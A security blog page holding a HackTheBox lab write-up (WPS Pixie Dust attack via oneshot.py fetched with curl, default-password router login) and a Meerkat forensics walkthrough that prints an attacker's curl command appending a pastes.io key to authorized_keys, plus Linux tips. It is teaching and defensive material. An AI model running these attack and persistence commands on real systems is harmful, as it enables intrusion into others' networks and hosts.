    root@attica01:/opt/PLC/OpenPLC_v3/webserver# whoami 
    whoami 
    root 
    root@attica01:/opt/PLC/OpenPLC_v3/webserver# 
    

    The exploit really just uploads some C code and executes it, but the included C reverse shell is non-blocking and spawns in the background, which is nice! :)

    From here we can change to the root directory and get the user flag - user because of course this is actually a container, which we now need to get out of:

    root@attica02:/# cat /proc/1/environ
    container=lxccontainer_ttys=
    

    Privilege escalation to root

    I enumerated this box for a while, but the only thing which really jumps out is the presence of a wireless LAN interface, which is:

    1 - Sort of unusual in a container

    2 - Clearly related to the name of the box (Serious point here, CTFs are often a bit contrived so it’s certainly not cheating to use any context clues you’re given!)

    ip addr 
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 
       link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 
       inet 127.0.0.1/8 scope host lo 
        valid_lft forever preferred_lft forever 
       inet6 ::1/128 scope host  
        valid_lft forever preferred_lft forever 
    2: eth0@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000 
       link/ether 00:16:3e:fc:91:0c brd ff:ff:ff:ff:ff:ff link-netnsid 0 
       inet 10.0.3.2/24 brd 10.0.3.255 scope global eth0 
        valid_lft forever preferred_lft forever 
       inet 10.0.3.52/24 metric 100 brd 10.0.3.255 scope global secondary dynamic eth0 
        valid_lft 2345sec preferred_lft 2345sec 
       inet6 fe80::216:3eff:fefc:910c/64 scope link  
        valid_lft forever preferred_lft forever 
    5: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000 
       link/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff
    

    So we have a wireless interface, but it’s currently in the down state, meaning we’re not connected to anything - can we find any wireless networks to connect to? A scan with iwlist says yes!:

    wlan0 Scan completed :
    Cell 01 - Address: 02:00:00:00:01:00
    Channel:1
    Frequency:2.412 GHz (Channel 1)
    Quality=70/70 Signal level=-30 dBm
    Encryption key:on
    ESSID:"plcrouter"
    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
    9 Mb/s; 12 Mb/s; 18 Mb/s
    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
    Mode:Master
    

    And iw scan also reveals some interesting information, including, critically, that WPS is currently enabled. Now, time for honesty - I would probably have gotten stuck here but for the fact I’d literally just finished reading about the workings of the “Pixie dust” attack (learn more here: https://forums.kali.org/archived/showthread.php?24286-WPS-Pixie-Dust-Attack-(Offline-WPS-Attack) ) which, it just so happens, will work here.

    root@attica02:/# iw wlan0 scan
    BSS 02:00:00:00:01:00(on wlan0)
    last seen: 2739.320s [boottime]
    TSF: 1722071149860324 usec (19931d, 09:05:49)
    freq: 2412
    beacon interval: 100 TUs
    capability: ESS Privacy ShortSlotTime (0x0411)
    signal: -30.00 dBm
    last seen: 0 ms ago
    Information elements from Probe Response frame:
    SSID: plcrouter
    Supported rates: 1.0* 2.0* 5.5* 11.0* 6.0 9.0 12.0 18.0
    DS Parameter set: channel 1
    ERP: Barker_Preamble_Mode
    Extended supported rates: 24.0 36.0 48.0 54.0
    RSN: * Version: 1
    * Group cipher: CCMP
    * Pairwise ciphers: CCMP
    * Authentication suites: PSK
    * Capabilities: 1-PTKSA-RC 1-GTKSA-RC (0x0000)
    Supported operating classes:
    * current operating class: 81
    Extended capabilities:
    * Extended Channel Switching
    * SSID List
    * Operating Mode Notification
    WPS: * Version: 1.0                              <---- Interesting!
    * Wi-Fi Protected Setup State: 2 (Configured)
    * Response Type: 3 (AP)
    * UUID: 572cf82f-c957-5653-9b16-b5cfb298abf1
    * Manufacturer:
    * Model:
    * Model Number:
    * Serial Number:
    * Primary Device Type: 0-00000000-0
    * Device name:
    * Config methods: Label, Display, Keypad
    * Version2: 2.0
    

    While the workings of this attack are complex, as a would-be attacker we don’t have to care since we can rely on the fantastic oneshot.py script which will do the heavy lifting for us. We’ll first transfer the script:

    root@attica01:~# curl http://10.10.14.34:8080/oneshot.py > oneshot.py 
    curl http://10.10.14.34:8080/oneshot.py > oneshot.py 
      % Total   % Received % Xferd  Average Speed  Time   Time   Time  Current 
                     Dload  Upload  Total  Spent   Left  Speed 
    100 53267  100 53267   0   0  239k    0 --:--:-- --:--:-- --:--:--  238k 
    root@attica01:~# chmod +x oneshot.py 
    chmod +x oneshot.py 
    

    Give it execute permissions and pass it the wlan0 interface we already discovered as an argument:

    root@attica01:~# ./oneshot.py -i wlan0 
    ./oneshot.py -i wlan0 
    [*] Running wpa_supplicant… 
    [*] BSSID not specified (--bssid) — scanning for available networks 
    Networks list: 
    #   BSSID        ESSID           Sec.   PWR  WSC device name       WSC model
    
    1) 02:00:00:00:01:00  plcrouter         WPA2   -30                  
    
    Select target (press Enter to refresh): 1 
    [*] Running wpa_supplicant… 
    [*] Trying PIN '12345670'… 
    [*] Scanning… 
    [*] Authenticating… 
    [+] Authenticated 
    [*] Associating with AP… 
    [+] Associated with 02:00:00:00:01:00 (ESSID: plcrouter) 
    [*] Received Identity Request 
    [*] Sending Identity Response… 
    [*] Received WPS Message M1 
    [*] Sending WPS Message M2… 
    [*] Received WPS Message M3 
    [*] Sending WPS Message M4… 
    [*] Received WPS Message M5 
    [+] The first half of the PIN is valid 
    [*] Sending WPS Message M6… 
    [*] Received WPS Message M7 
    [+] WPS PIN: '12345670' 
    [+] WPA PSK: 'NoWWEDoKnowWhaTisReal123!' 
    [+] AP SSID: 'plcrouter' 
    root@attica01:~# 
    
    
    

    Now that we know the shared key, we can set up a WPA supplicant and try to connect to the network - we first put the details into a config file, then establish the connection with wpa_supplicant -B

    root@attica01:/opt/PLC# wpa_passphrase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config 
    <rase plcrouter 'NoWWEDoKnowWhaTisReal123!' > config 
    
    root@attica01:/opt/PLC# wpa_supplicant -B -c config -i wlan0 
    wpa_supplicant -B -c config -i wlan0 
    Successfully initialized wpa_supplicant 
    

    It looks like that worked - we can quickly verify:

    root@attica02:/tmp# iwconfig wlan0
    wlan0 IEEE 802.11 ESSID:"plcrouter"
    Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:01:00
    Bit Rate:54 Mb/s Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:on
    Link Quality=70/70 Signal level=-30 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:9 Missed beacon:0
    

    We’re connected, but apparently DHCP isn’t running and we haven’t been assigned an IP address - let’s just configure one manually, avoiding 192.168.1.1, which is almost certainly the router itself.

    root@attica01:/opt/PLC# ifconfig wlan0 192.168.1.5 netmask 255.255.255.0 
    ifconfig wlan0 192.168.1.5 netmask 255.255.255.0 
    

    Now that we’re on the network, let’s gather a bit more information about the router…

    root@attica01:~# curl 192.168.1.1
    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
            <head>
                    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
                    <meta http-equiv="Pragma" content="no-cache" />
                    <meta http-equiv="Expires" content="0" />
                    <meta http-equiv="refresh" content="0; URL=cgi-bin/luci/" />
                    <style type="text/css">
                            body { background: white; font-family: arial, helvetica, sans-serif; }
                            a { color: black; }
    
                            @media (prefers-color-scheme: dark) {
                                    body { background: black; }
                                    a { color: white; }
                            }
                    </style>
            </head>
            <body>
                    <a href="cgi-bin/luci/">LuCI - Lua Configuration Interface</a>
            </body>
    </html>
    

    Hmm, well that’s interesting - the LuCI Lua Configuration Interface is part of OpenWrt, an open-source routing platform. By default, OpenWrt is also pretty lax with passwords - in fact, if I remember correctly, the root password is just blank…

    root@attica01:/opt/PLC# ssh root@192.168.1.1 
    ssh root@192.168.1.1 
    Pseudo-terminal will not be allocated because stdin is not a terminal. 
    Host key verification failed. 
    root@attica01:/opt/PLC# python3 -c "import pty; pty.spawn('/bin/bash')" 
    python3 -c "import pty; pty.spawn('/bin/bash')" 
    root@attica01:/opt/PLC# ssh root@192.168.1.1 
    ssh root@192.168.1.1 
    The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established. 
    ED25519 key fingerprint is SHA256:ZcoOrJ2dytSfHYNwN2vcg6OsZjATPopYMLPVYhczadM. 
    This key is not known by any other names 
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 
    yes 
    Warning: Permanently added '192.168.1.1' (ED25519) to the list of known hosts. 
    BusyBox v1.36.1 (2023-11-14 13:38:11 UTC) built-in shell (ash) 
    
      _______                     ________        __
     |       |.-----.-----.-----.|  |  |  |.----.|  |_
     |   -   ||  _  |  -__|     ||  |  |  ||   _||   _|
     |_______||   __|_____|__|__||________||__|  |____|
              |__| W I R E L E S S   F R E E D O M
     -----------------------------------------------------
     OpenWrt 23.05.2, r23630-842932a63d
     -----------------------------------------------------
    === WARNING! ===================================== 
    There is no root password defined on this device! 
    Use the "passwd" command to set up a new password 
    in order to prevent unauthorized SSH logins. 
    --------------------------------------------------
    root@ap:~# ls 
    ls 
    root.txt 
    root@ap:~# cd /root 
    cd /root 
    root@ap:~# cat root.txt 
    cat root.txt 
    51a6fc2a20efda3626f1483e9babedb4 
    root@ap:~# 
    

    Shoot, it worked! Two default passwords on one box!

    Avoiding the Hack - Lessons learned

    So let’s now take a look at the vulnerabilities we found, and how they could have been avoided, although this time the lesson seems pretty clear!

    Never, ever, ever leave a default password on a device! New legislation is finally coming into place worldwide which obliges manufacturers to ship new devices with better, “unique”* passwords, but you should never leave these hanging around regardless. Keeping defaults is a terrible idea from a security perspective, but also from an ops point of view - it’s easy to look at the code on the bottom of the router now, but perhaps not once you’ve shipped it out to a branch office.

    * Dear hardware manufacturers - hashing the device ID, product number or anything else written on the case and using the beginning or end portion as a password does not count as secure, even if it is technically unique. Sort of. MD5 doesn’t really meet that criteria either. A CRC certainly doesn’t. Rant over :)

  • Writeups

    Sherlocks are a new offering from HackTheBox - they’ve been available since the tail end of 2023, but I’ve been busy and have only just had time to dive into them. Rather than focusing on offensive security techniques, Sherlocks provide a great opportunity to sharpen your blue teaming skills - and so far I think they’re great fun! Here, there are no flags to capture - rather, you need to obtain information to solve a series of tasks, quite similar to the approach used on HTB Academy. Meerkat is rated as “easy” by HackTheBox - it’s a great place to start with Sherlocks, so let’s dive in!

    Scenario

    Sherlocks come with a bit of scenario information which can help you along the way with the tasks - I wish HTB machines also did this! For Meerkat, we get:

    As a fast growing startup, Forela have been utilising a business management platform. Unfortunately our documentation is scarce and our administrators aren’t the most security aware. As our new security provider we’d like you to take a look at some PCAP and log data we have exported to confirm if we have (or have not) been compromised.

    There’s also a zip file to download, which contains a .pcap file with network traffic from the time of the suspected compromise, as well as a .json file which seems to list some security events logged at the same time.

    We’ll open up the pcap file in wireshark - the json file is also worth a look through, but I was able to complete all the tasks just using the pcap. Let’s now work through the tasks.

    Tasks

    1 - We believe our Business Management Platform server has been compromised. Please can you confirm the name of the application running?

    First of all, we’ll want to get our bearings and figure out which system is hosting the business management platform - a good way to start analysing a pcap is to get a feel for which systems are sending the most traffic. Often (but not always) these will be of the most interest. We can easily find this out by choosing

    Statistics -> IPv4 Statistics -> All Addresses from the menu:

    172.31.6.44 is clearly the busiest host in this capture, and we also have significant traffic from 156.146.62.213, 34.207.150.13, 54.144.148.213, 95.181.232.30, and 138.199.59.221.

    As a starting point, let’s filter the packets for those destined to 172.31.6.44 - in the wireshark filter bar, we can type ip.dst == 172.31.6.44 to do this easily.

    Browsing through the traffic we can quickly see there’s some HTTP traffic heading to an endpoint called /bonita/loginservice

    Bonita sounds like it could be the business management service, and a quick google confirms this is the case.

    Answer Number 1: Bonitasoft.

    We believe the attacker may have used a subset of the brute forcing attack category - what is the name of the attack carried out?

    In order to answer this one, let’s explore the traffic a bit further - we can filter our results down even more at this point too. Right now we’re only interested in POST requests (i.e. login requests) to the business management system, so let’s add && http.request.method == POST to our filter. Being able to quickly filter traffic down to the information we’re interested in is one of Wireshark’s best features, so it’s worth experimenting a little if this is new to you!

    Now, we only have relevant traffic in view - these are all login attempts directed to the relevant server - clicking on a packet allows us to see the content (in the bottom pane), and working through these attempts reveals different usernames and passwords being submitted. More importantly for this task, we notice that sets of credentials (rather than multiple usernames with a single password at a time, or vice versa) are being used - so the correct term is “credential stuffing”. We can also confirm that 156.146.62.213 is probably the primary attacker machine, since this is where each of these login attempts originates from.

    Answer Number 2: Credential Stuffing

    Does the vulnerability exploited have a CVE assigned - and if so, which one?

    There were two ways to approach this task - I simply kept scrolling through the requests here, until I saw an interesting one which jumped out at me:

    As you can see, packet numbers 2918 and 2925 don’t seem to be the same credential stuffing attack, rather we’ve got an unusual string in a request to an API endpoint - at this point, I googled “i18ntranslation bonitasoft” (Note- If you’re wondering: that ? is the query string delimiter, and not part of the string itself) and hit on this page from Rhino Security Labs:

    An alternative approach here would have been to check the json file with the security alerts - it does indeed have some warnings for CVE-2022-25237.

    Answer Number 3: CVE-2022-25237

    Which string was appended to the API URL path to bypass the authorization filter by the attacker’s exploit?

    Too easy - we already have that one!

    Answer Number 4: i18ntranslation

    How many combinations of usernames and passwords were used in the credential stuffing attack?

    For this one, we’ll want to filter down to find all of the requests to the login endpoint - we can do this with:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice"

    We can see from the bottom of the Wireshark window that this gives us 118 packets - however, that’s not the right answer - some of these packets are duplicates using some installer credentials:

    So, let’s update our filter to get rid of those:

    http.request.method == "POST" && http.request.uri contains "/bonita/loginservice" && !(http contains "install")

    I’m not sure if HTB are including this install/install combination as part of their credential stuffing count - I’ll assume not, but keep in mind that I might need to add one more to my answer later. This filter now gives 59 packets, but this isn’t the right answer either - looking through, there’s still a duplicate or two in there.

    To make things speedy, I’ll output the packets to a file, then use a bit of bash-fu to solve this one:

    Since the .pcapng I’ve exported from Wireshark is a binary rather than a text format, I’ll need to use the strings command to get the content, then pass this to grep to get the strings matching “username” (which is present in all the login attempts); then I’ll use cut to separate the data at the = sign and print out the second field (i.e. the part after the =). Visually, this gives something like this:

    $ strings creds.pcapng | grep username | cut -d = -f 2 | uniq  
    Clerc.Killich%40forela.co.uk&password 
    Lauren.Pirozzi%40forela.co.uk&password 
    <SNIP>
    Mathian.Skidmore%40forela.co.uk&password 
    Gerri.Cordy%40forela.co.uk&password 
    seb.broom%40forela.co.uk&password 
    

    Finally, I’ll pass this to wc (with the -l argument to get the number of lines)

    $strings creds.pcapng | grep username | cut -d = -f 2 | uniq | wc -l

    This gives me 56, which is the right answer. If you wanted an easier way of doing that, you could also just count the different logins by working through each packet. Something like this works better at scale however.
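
    One caveat with that pipeline: uniq only collapses adjacent duplicates, so if identical logins had been scattered through the capture rather than sent back-to-back, it would be safer to sort first:

    strings creds.pcapng | grep username | cut -d = -f 2 | sort -u | wc -l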

    Answer Number 5: 56

    Which username and password combination was successful?

    To solve this one, it’s possible to simply work through the packets using a filter like this:

    ip.src_host == 172.31.6.44 && ip.dst_host == 156.146.62.213 && http

    To see all the HTTP response packets from the business server to the attacker - we can work through this looking for a 2XX code, which will indicate success:

    We can find the login which was valid by working through the communications here - or, using our knowledge of HTTP response codes, we can make things really fast by searching for a 204 (login success!) response.

    This approach quickly finds the relevant packet, and the credentials which were used. In addition, we can see here that more than one IP was able to successfully authenticate - 138.199.59.221 also logged in. Let’s note that.

    If we explore the JSON format packets which follow this response, we can also see evidence of the attacker utilising the POC script provided in the Rhino Security Labs article, which further confirms the attack which took place.

    Answer Number 6: seb.broom@forela.co.uk:g0vernm3nt

    If any, which text sharing site did the attacker utilise?

    Let’s now “zoom out” a little and get a broader view of what’s happening as part of this attack - we know that the attacker used a POC for the relevant CVE to gain access to the server, and it looks like they also used more than one host as part of the attack. From here, we’ll therefore filter with ip.host == 172.31.6.44 && http to get all of the HTTP traffic to the business server again. Scrolling through, we can see the attacker exploiting the vulnerability to run cat /etc/passwd and then again using wget to grab a file with wget https://pastes.io/raw/bx5gcr0et8 - that’s our answer for this one!

    Here we’re finding the file we need in the packet view:

    Answer Number 7: Pastes.io

    Please provide the filename of the public key used by the attacker to gain persistence on our host.

    Let’s go and check out the file which is being downloaded here:

    So, this file contains a curl command which will download another text file (also from pastes.io) before appending it to the authorized_keys file. The content of pastes.io/hffgra4unv will be the attacker’s public key - and adding it to the system’s authorized_keys file will provide them with a persistent way to log in using SSH.
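
    Reconstructed from the behaviour described above (so treat the exact syntax as a sketch), the fetched script boils down to something like:

    # append the attacker's public key so they can later SSH in as the ubuntu user
    curl https://pastes.io/raw/hffgra4unv >> /home/ubuntu/.ssh/authorized_keys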

    Answer Number 8: hffgra4unv

    Can you confirm the file modified by the attacker to gain persistence?

    Another easy one, we already have this information!

    Answer Number 9: /home/ubuntu/.ssh/authorized_keys

    Can you confirm the MITRE technique ID of this type of persistence mechanism?

    Finally, a quick visit to the MITRE ATT&CK website and a search for SSH authorized keys will allow us to find the technique ID: https://attack.mitre.org/techniques/T1098/004/

    Answer Number 10: T1098.004

    Final thoughts

    I really enjoyed Meerkat and I love the idea of sherlocks! Recently, I’ve felt that HTB machines have been becoming more and more nuanced and often, a bit obscure - this makes sense, it’s a gamified platform and they want to keep players interested, however I much prefer challenges which feel relevant to real world security. Sherlocks (so far at least) feel much more relevant and a great way to sharpen your blue teaming skills.

    See you in the next one!

Stuff I've learned

Latest Tips ( all )

  • Tips

    I recently ran into another interesting “bug” (I sure do seem to find a lot of them) although this one, to be fair, is more of a quirk than an actual error.

    As I often seem to need to do at the moment, I was spinning up a new Ubuntu instance in VirtualBox. VirtualBox v7 has a fancy new feature called “Unattended Installation” which I hadn’t previously either noticed or had cause to use. I thought I’d give it a try and found that it did, indeed, set my system up using the credentials that it asked me for, and even installed the Guest Tools. What’s not to love?

    Well, how about the fact that on booting I’m not root and have no idea of the root password. No problem - let’s sudo su… nope, password prompt. sudo -s? Nope, password prompt. sudo [the command I wanted to run] - password prompt. Shoot. I’ve no idea what the root password is. It turns out that VirtualBox 7’s “Unattended Installation” does not put your initial user into the sudo group - instead, it sets the root (uid=0) password to the same password as the initial user (uid=1000).

    The solution is therefore to run su - and use the password you specified when kicking off the installation, then add your user to the sudo group with usermod -a -G sudo [username].
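
    Concretely, with duck standing in for your own username (you’ll need to log out and back in before the new group membership takes effect):

    # become root using the password chosen during the unattended install
    su -
    # then, as root, add the original user to the sudo group
    usermod -a -G sudo duck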

    This is a really weird way of going about this - VirtualBox, if you’re reading - Love the unattended installation option, don’t love this setup!

  • Tips

    After upgrading an Ubuntu machine to 23.10, I ran into an interesting error - although the upgrade was successful, the system in question still seemed to think it was running the previous version of Ubuntu. Running lsb_release gave me the following, still showing the old version from which I had just upgraded:

    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.04
    Release:        23.04
    Codename:       lunar
    

    I was not able to find a solid explanation as to exactly why this happened! My best guess is that one or more of the base files were modified (by me) and therefore were not updated during the upgrade. The solution was to reinstall the base-files package, which contains /etc/lsb-release:

    duck@server:~$ sudo apt reinstall base-files
    Reading package lists... Done
    Building dependency tree... Done
    Reading state information... Done
    The following package was automatically installed and is no longer required:
      wmdocker
    Use 'sudo apt autoremove' to remove it.
    The following packages will be upgraded:
      base-files
    1 upgraded, 0 newly installed, 0 to remove and 5 not upgraded.
    Need to get 73.8 kB of archives.
    After this operation, 26.6 kB of additional disk space will be used.
    Get:1 http://im.archive.ubuntu.com/ubuntu mantic-updates/main amd64 base-files amd64 13ubuntu2.1 [73.8 kB]
    Fetched 73.8 kB in 1s (92.4 kB/s)   
    (Reading database ... 199351 files and directories currently installed.)
    Preparing to unpack .../base-files_13ubuntu2.1_amd64.deb ...
    Unpacking base-files (13ubuntu2.1) over (12.3ubuntu2.1) ...
    Setting up base-files (13ubuntu2.1) ...
    Installing new version of config file /etc/debian_version ...
    Installing new version of config file /etc/issue.net ...
    motd-news.service is a disabled or a static unit not running, not starting it.
    Processing triggers for plymouth-theme-ubuntu-text (22.02.122-3ubuntu2) ...
    update-initramfs: deferring update (trigger activated)
    Processing triggers for install-info (7.0.3-2) ...
    Processing triggers for man-db (2.11.2-3) ...
    Processing triggers for initramfs-tools (0.142ubuntu15.1) ...
    update-initramfs: Generating /boot/initrd.img-6.5.0-14-generic
    
    
    

    Now, uname -a and lsb_release -a both display correctly.

    duck@server:~$ uname -a
    Linux server 6.5.0-14-generic #14-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 14 14:59:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
    
    duck@server:~$ lsb_release -a
    No LSB modules are available.
    Distributor ID: Ubuntu
    Description:    Ubuntu 23.10
    Release:        23.10
    Codename:       mantic
    

    Hopefully, this helps someone!

  • Tips

    As part of creating training material, or perhaps making a vulnerable machine for a CTF, I often need to enable MySQL root access with a password - and often a poor password which you should never use in a production environment! Doing this on Ubuntu has become a bit more tricky (although really that’s a good thing), but it’s also something I need to do often enough that forgetting the correct way to do it on an up-to-date system is a real nuisance!

    By default, Ubuntu does not configure the MySQL root account to authenticate with a password - rather, you access a new installation by running either sudo mysql or spawning a root shell and just running mysql. Incidentally, this approach also breaks the mysql_secure_installation script, which is worth running for a production environment as it does pretty much what it says on the tin! Once you’ve accessed the root account, the ‘normal’ approach most people take to changing the password (and this is the error I usually make) is to run:

    ALTER USER 'root'@'localhost' IDENTIFIED BY 'password';
    

    And while this command will run, it won’t give you password access on Ubuntu, since the root account is still set to authenticate with the auth_socket plugin rather than a password - therefore, we need to run:

    sudo mysql
    

    Then run an ALTER USER command which both changes the password and sets the root user’s authentication method to one that actually uses it - the following example switches the authentication method to mysql_native_password:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH mysql_native_password BY 'password';
    

    After making this change, exit the MySQL prompt:

    exit
    

    Following that, you can run the mysql_secure_installation script without any errors - or, if you’re making a vulnerable / training system, you can now log in with

    mysql -u root -p
    

    If you’d like to revert to the default setting on Ubuntu (perhaps after running mysql_secure_installation) simply use the command:

    ALTER USER 'root'@'localhost' IDENTIFIED WITH auth_socket;
    
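    If you’re ever unsure which state the root account is in, you can check which authentication plugin it’s currently using - a quick sketch, pick whichever invocation works for you at the time:

    # if root still uses auth_socket:
    sudo mysql -e "SELECT user, host, plugin FROM mysql.user WHERE user = 'root';"
    # if you've already switched to password authentication:
    mysql -u root -p -e "SELECT user, host, plugin FROM mysql.user WHERE user = 'root';"
    # auth_socket is the Ubuntu default; mysql_native_password means password login is enabled
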
  • Tips

    If you’ve tried to install a Python package using pip install recently, and you’re running Debian 12 (or a derivative like Parrot 6 in my case) you may have been stumped by this error message:

    error: externally-managed-environment
    
    × This environment is externally managed
    ╰─> To install Python packages system-wide, try apt install
        python3-xyz, where xyz is the package you are trying to
        install.
    
        If you wish to install a non-Debian-packaged Python package,
        create a virtual environment using python3 -m venv path/to/venv.
        Then use path/to/venv/bin/python and path/to/venv/bin/pip. Make
        sure you have python3-full installed.
    
        If you wish to install a non-Debian packaged Python application,
        it may be easiest to use pipx install xyz, which will manage a
        virtual environment for you. Make sure you have pipx installed.
    
        See /usr/share/doc/python3.11/README.venv for more information.
    
    note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this, at the risk of breaking your Python installation or OS, by passing --break-system-packages.
    hint: See PEP 668 for the detailed specification.
    

    What’s going on here? Essentially, the externally-managed-environment error occurs when the system package manager (so apt, in this case) is managing Python packages; as a result, pip is not allowed (by default) to interfere with them. If we take a look at the Python enhancement proposal PEP 668 we can see that the objective of this change is essentially to prevent users from unintentionally modifying packages which are required by the distribution and breaking stuff. Actually, this is a pretty good idea - however, it can be a pain if you’d rather run the risk and continue to use pip with reckless abandon like I would.

    It’s worth pointing out that if you’re managing a production system, you really should follow the advice given and try to install your required package using apt to get the version which is supported in your distro’s repository - simply run sudo apt install python3-[desired package]. Again, if you need a package which isn’t in the repos, using a venv is the best way to go.
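
    For reference, the venv route is only a couple of commands - a minimal sketch, using a made-up package name and venv path:

    python3 -m venv ~/venvs/tools               # create an isolated environment (needs python3-venv or python3-full)
    ~/venvs/tools/bin/pip install somepackage   # pip inside the venv is not restricted
    # or, for a standalone application, let pipx create and manage the venv for you:
    pipx install somepackage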

    If, however, you want to be reckless, you have two options…

    Option 1 - Break system packages

    The error message says you can pass in the flag --break-system-packages and you can do exactly that - this won’t deliberately break system packages, rather it’s just overriding the protection which has been introduced and doing what pip always used to do. It might break some system packages though - it kinda told you that :)

    If using a venv is more effort than you want to put in (pipx does make this quite easy!) a good halfway house would be to try getting the package from apt first, and then use --break-system-packages if the package isn’t present in the repo.
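
    In shell terms that halfway house might look something like this - python3-requests / requests is just an example, substitute your own package:

    # prefer the distro package; only fall back to pip's override if apt has nothing
    sudo apt install python3-requests \
        || pip install requests --break-system-packages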

    Option 2 - Delete EXTERNALLY-MANAGED

    For a longer-term solution which will totally disable this message, you can delete the EXTERNALLY-MANAGED file in your system Python installation:

    sudo rm -rf /usr/lib/python3.11/EXTERNALLY-MANAGED
    

    This will totally disable the protection though, so use it with care. Python 3.11 is current as I’m writing this, but by the time you read it that path may well be different, depending on your installed Python version.

Things that don't go in one of the other categories

Other Stuff ( all )

  • Other

    May 18, 2024 by Ducksec

    CompTIA SecurityX

    Last week I was invited by CompTIA to take the new SecurityX beta - so why not! I already have the CASP+, so this is a great opportunity to refresh knowledge and learn some new things - all for $50! The new eXpert series from CompTIA will eventually feature three exams: DataX, SecurityX and CloudNetX. According to CompTIA:

    CompTIA Advanced Security Practitioner (CASP+) is the expert version of CompTIA Security+ and will be re-branded to SecurityX, with the next exam version. This name change will not affect the status of current CASP+ certification holders and those with an active CASP+ certification will receive a SecurityX certification. The certification will continue to:

    • Validate job tasks performed by a security professional with 10 years of IT experience and 5 years of security experience
    • Be designed around the tasks performed by senior security engineer and security architect roles
    • Be a natural progression from the job roles aligned to Security+

    I’ll be updating this blog as I make better notes on the changes between the old and new syllabi, but for now let’s dive in with some initial impressions.

    So what’s changed?

    As usual there are some general updates to ensure the certification aligns with the newest approaches and tools, but there are also some larger shifts in the core areas of focus. My overall impression is that the SecurityX (CAS-005) specification places a stronger emphasis on proactive and advanced security measures which are more suitable for today’s hyper-connected environments, whilst adding some key new areas, such as AI security.

    For example, CompTIA have included objectives covering the adoption of zero trust architecture, cloud access security brokers (CASBs), and the integration of AI in security operations. An increased emphasis on automated security processes, including Security Orchestration, Automation, and Response (SOAR), and advanced cryptographic concepts like homomorphic encryption and post-quantum cryptography, also suggest a shift towards more sophisticated and automated security frameworks.

    In some places, familiar topics have been somewhat deepened and modernised - the inclusion of topics like continuous integration/continuous deployment (CI/CD) and advanced application security testing reflects the growing importance of secure software development practices, and an expanded approach to risk management is evident in sections covering supply chain risk management, formal methods for software security, and the introduction of Software Bill of Materials (SBoM).

    Here’s a quick summary of what’s changed - if you’re planning to take the beta, hopefully this helps you to focus in on what you may need to put some extra study into!

    Quick summary of Changes between CASP+ (CAS-004) and SecurityX (CAS-005)

    Firstly, the certification Domains have been re-named and modified:

    CASP+ (CAS-004) Domains

    1. Security Architecture
    2. Security Operations
    3. Security Engineering
    4. Security Governance, Risk, and Compliance

    SecurityX (CAS-005) Domains

    1. Governance, Risk and Compliance
    2. Security Architecture
    3. Security Engineering
    4. Security Operations

    As you might expect there’s some new topics in each section - for now, here’s a quick rundown of items which jumped out at me:

    New Topics and Areas of Focus in SecurityX (CAS-005)

    1. Governance, Risk and Compliance
      • Supply Chain Risk Management
      • Updated GRC frameworks (DMA, COPPA etc.)
      • Focus on AI Security challenges
    2. Security Architecture
      • Zero Trust Architecture
      • Cloud Access Security Broker (CASB)
      • Integration of AI in Security
      • Software-Defined Networking (SDN)
      • Secure Access Service Edge (SASE)
      • Formal Methods for Software Security
      • Software Bill of Materials (SBoM)
      • Greater focus on APIs
    3. Security Engineering
      • Advanced Cryptographic Concepts
      • Specialised systems (IoT / OT)
      • Authenticated Encryption with Associated Data (AEAD)
      • TOML (Tom’s Obvious, Minimal Language)
      • Blockchain and Immutable Databases
      • Use of Post-Quantum Cryptography (PQC)
      • Virtualised technologies (eg vTPM)
    4. Security Operations
      • Greater focus on automation
      • Rita and Sigma (Rule based languages)

    I will update this post with more analysis as I start my studying!

  • Other

    Introduction

    Last year I enjoyed completing the AWS Solutions Architect Associate exam - so what better way to kick off 2024 than by taking on the Security specialism?!

    Certification Overview

    The AWS Certified Security - Specialty certification is a popular accreditation offered by Amazon Web Services (AWS) that, according to AWS “validates your expertise in creating and implementing security solutions in the AWS Cloud. This certification also validates understanding of specialised data classifications and AWS data protection mechanisms; data-encryption methods and AWS mechanisms to implement them; and secure internet protocols and AWS mechanisms to implement them.”.

    At the outset, it’s worth being clear that this is very much an AWS security certification - not a security certification with AWS as the focus. By this I mean that if you don’t already have a solid grounding in security principles don’t expect to master them by pursuing this certification, rather, take this certification to see how those principles apply in AWS specifically.

    AWS recommend that “AWS Certified Security - Specialty is intended for experienced individuals who have five years of IT security experience in designing and implementing security solutions and two or more years of hands-on experience in securing AWS workloads.” - my sense is that 5 years of security experience may be a bit overkill - the general security knowledge level required is probably on a par with Security+ - but the two years hands-on with AWS isn’t. While the certification certainly covers many of the familiar services you know and love, it does tend to focus on more unusual situations, edge cases and nuanced applications which you probably won’t be familiar with unless you’ve used the platform for a while.

    Exam Details

    • Exam Title: AWS Certified Security - Specialty

    • Exam Code: SCS-C02

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 750 (on a scale of 100-1000)

    Exam Domains

